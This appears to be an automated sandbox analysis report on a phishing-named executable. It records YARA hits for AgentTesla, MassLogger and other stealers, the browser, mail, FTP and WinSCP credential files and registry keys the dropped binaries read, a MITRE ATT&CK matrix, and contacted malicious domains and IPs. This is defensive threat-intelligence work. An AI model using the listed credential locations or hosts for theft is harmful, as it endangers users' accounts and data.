Source: Yara match	File source: 00000005.00000002.1300865419.0000000005800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1596364234.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1580669736.0000000007205000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1329059100.0000000008400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1596182253.0000000008640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.73873c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server02.exe PID: 6012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7848, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\server02.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6f05570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6f42790.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6f42790.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.neworigin.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.73873c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6f05570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3712810154.00000000029C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server02.exe PID: 6012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7848, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 5.2.svchost.exe.6f05570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6f42790.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6f42790.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.neworigin.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6f05570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 520, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Yara detected MassLogger RAT

Source: Yara match	File source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.73873c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server02.exe PID: 6012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7848, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 5.2.svchost.exe.5800f16.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.8640000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.8400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.7206478.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.svchost.exe.8200000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.5800f16.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6fa8b90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.8400f08.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.42.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.5e00f16.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.8b00000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.7206478.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.7205570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.5e00f16.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6f05570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8600f08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.8b00f08.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.8260000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.8260000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6f42790.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.8640000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.svchost.exe.8200f08.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.svchost.exe.8200000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.8400f08.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8600f08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8480000.41.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.72a8b90.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.8b00f08.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.6fa8b90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.8400000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.72a8b90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.7205570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.svchost.exe.8200f08.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8480000.40.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.8b00000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.svchost.exe.8440000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000003.1483462887.0000000008600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1577778530.0000000005E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1283416530.0000000008200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1328426557.0000000008260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1300865419.0000000005800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1596364234.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1580669736.0000000007205000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1329059100.0000000008400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1596182253.0000000008640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.73873c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server02.exe PID: 6012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7848, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\server02.exe, type: DROPPED

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000D923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_000D923B
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000D8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_000D8C4F
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_0091923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_0091923B
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_00918C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	2_2_00918C4F

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	121 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	111 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	14 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	211 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	2 Valid Accounts	2 Valid Accounts	4 Obfuscated Files or Information	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	1 Windows Service	21 Access Token Manipulation	11 Software Packing	NTDS	148 System Information Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Scheduled Task/Job	1 Windows Service	1 Timestomp	LSA Secrets	1 Query Registry	SSH	211 Input Capture	24 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	2 Registry Run Keys / Startup Folder	312 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	351 Security Software Discovery	VNC	4 Clipboard Data	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	111 Masquerading	DCSync	141 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	141 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	312 Process Injection	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	42%	ReversingLabs	Win32.Trojan.AutoitInject
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\System32\alg.exe	100%	Avira	W32/Infector.Gen
C:\Users\user\AppData\Local\Temp\TrojanAI.exe	100%	Avira	HEUR/AGEN.1311721
C:\Users\user\AppData\Local\Temp\server02.exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\bothsided\spadixes.exe	100%	Avira	W32/Infector.Gen
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	100%	Avira	HEUR/AGEN.1311721
C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	100%	Avira	W32/Infector.Gen
C:\Users\user\AppData\Local\Temp\neworigin.exe	100%	Avira	TR/Spy.Gen8
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Windows\System32\alg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\TrojanAI.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\server02.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\bothsided\spadixes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\neworigin.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\TrojanAI.exe	92%	ReversingLabs	ByteCode-MSIL.Infostealer.ClipBanker
C:\Users\user\AppData\Local\Temp\neworigin.exe	82%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\server02.exe	83%	ReversingLabs	ByteCode-MSIL.Infostealer.Mintluks
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	92%	ReversingLabs	ByteCode-MSIL.Infostealer.ClipBanker

Source	Detection	Scanner	Label
http://www.microsoft.c)	0%	Avira URL Cloud	safe
http://54.244.188.177/yqmdwhskkjhif	0%	Avira URL Cloud	safe
http://x1.c.lencr.	0%	Avira URL Cloud	safe
http://54.244.188.177/vnpplpufavm	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cvgrf.biz	54.244.188.177	true	false	high
ssbzmoy.biz	18.141.10.107	true	false	high
pywolwnvd.biz	54.244.188.177	true	false	high
api.ipify.org	172.67.74.152	true	false	high
reallyfreegeoip.org	172.67.177.134	true	false	high
s82.gocheapweb.com	51.195.88.199	true	false	high
npukfztj.biz	44.221.84.105	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://api.ipify.org/	false	high
http://cvgrf.biz/yqmdwhskkjhif	false	high
http://checkip.dyndns.org/	false	high
http://pywolwnvd.biz/vnpplpufavm	false	high
https://reallyfreegeoip.org/xml/8.46.123.228	false	high
http://ssbzmoy.biz/kokmvod	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmp	false		high
http://54.244.188.177/yqmdwhskkjhif	svchost.exe, 00000022.00000002.1575903926.00000000032DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.dyn.com/	svchost.exe, 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1294374756.00000000002F2000.00000002.00000001.01000000.0000000B.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r11.o.lencr.org0#	neworigin.exe, 0000000D.00000002.3735546590.00000000084B6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735422799.000000000848C000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.000000000288C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3714279992.0000000002732000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3734725195.0000000008410000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3731779693.0000000005CE7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3732533373.0000000005D44000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3732308014.0000000005D1B000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3735176499.000000000845A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.orgd	server02.exe, 0000000C.00000002.3712810154.000000000290B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 0000000F.00000002.1388691557.000000000823F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000F.00000002.1370958443.0000000005819000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.228d	server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	server02.exe, 0000000C.00000002.3712810154.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, server02.exe, 0000000C.00000002.3712810154.00000000028DC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.c)	powershell.exe, 0000000F.00000002.1388691557.00000000081E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.	neworigin.exe, 0000000D.00000002.3735422799.000000000848C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org/t	neworigin.exe, 0000000D.00000002.3714279992.0000000002611000.00000004.00000800.00020000.00000000.sdmp	false		high
http://cvgrf.biz/	svchost.exe, 00000022.00000002.1575903926.00000000032DB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000F.00000002.1366121980.0000000004906000.00000004.00000800.00020000.00000000.sdmp	false		high
